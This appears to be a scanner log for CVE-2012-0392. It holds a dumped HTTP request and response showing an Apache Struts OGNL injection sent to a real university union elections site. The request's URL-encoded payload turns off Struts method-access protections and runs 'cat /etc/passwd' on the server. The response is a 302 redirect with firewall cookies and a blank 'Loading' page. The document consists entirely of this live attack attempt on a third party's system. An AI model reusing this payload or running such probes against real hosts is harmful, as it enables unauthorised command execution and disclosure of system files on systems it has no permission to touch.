[CVE-2012-0392] Dumped HTTP request for https://elections.union.unimelb.edu.au/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))


GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1
Host: elections.union.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2012-0392] Dumped HTTP response https://elections.union.unimelb.edu.au/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))

HTTP/1.1 302 Found
Connection: close
Content-Length: 122
Cache-Control: no-cache, no-store
Content-Type: text/html
Location: https://elections.union.unimelb.edu.au/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
Set-Cookie: visid_incap_3220071=+2oQ88sTSByrVJX57ktDTAtyk2gAAAAAQUIPAAAAAAC2OX6QLLwIIYKjbPuSo+uU; expires=Thu, 06 Aug 2026 07:06:45 GMT; HttpOnly; path=/; Domain=.union.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_237_3220071=AoB1B8TAOWcb57arov5JAwtyk2gAAAAAljzZQksO1c5hQuiAiUpqxg==; path=/; Domain=.union.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 5-4041373-0 0NNN RT(1754493451429 45) q(0 -1 -1 -1) r(0 -1) B13(3,900055,0) U24


<HTML><HEAD><TITLE>Loading</TITLE></HEAD><BODY bgcolor="#ffffff"><H3 style="color: #ffffff">Loading</H3></BODY></HTML>

